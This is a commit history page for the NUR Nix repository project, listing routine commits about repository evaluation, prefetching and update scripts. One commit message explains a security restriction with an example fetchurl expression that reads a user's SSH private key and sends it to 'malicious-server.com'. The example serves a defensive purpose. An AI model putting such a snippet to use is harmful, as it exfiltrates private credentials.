nix/6.NUR
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
56 commits 1 branch 0 tags 25 MiB
Commit graph

9 commits

Author SHA1 Message Date
Jörg Thalheim
a50860fcbb restrict evaluation of repos 
It should be save for users to evaluate nix code.
Therefore we restrict evaluation of repositories.
Otherwise an attacker could leak confidential data, i.e.:

fetchurl {
  url = "https://malicious-server.com/log-key?content=" + (builtins.readFile "../../.ssh/id_rsa");
  sha256 = "43c2c9e5e7a16b6c88ba3088a9bfc82f7db8e13378be7c78d6c14a5f8ed05afd";
}
 2018-07-01 15:50:39 +01:00
Jörg Thalheim
3f515f8bab test & automate format of repos.json 
fixes #12
 2018-07-01 13:56:51 +01:00
Jörg Thalheim
9a9ce070b4 allow to specify nix file that is sourced from repository 2018-07-01 12:03:01 +01:00
Jörg Thalheim
9df1b2a19f fix prefetching bare git repositories 2018-06-29 23:20:39 +01:00
Jörg Thalheim
6369f21e54 nur/update: also include nix-prefetch-git in script closure 2018-06-29 22:50:40 +01:00
Jörg Thalheim
351bfefbc3 generate default.nix from lock file 2018-06-29 12:15:26 +01:00
zimbatm
f862362090 update.py: allow to build without argument 
Generate the default.nix with a default pkgs argument so that it can be
used directly.
 2018-06-18 11:41:13 +01:00
zimbatm
69ff5681d5 chmod +x nur/update.py 2018-06-18 11:40:28 +01:00
Jörg Thalheim
b56a29434f first commit 2018-06-15 21:23:28 +01:00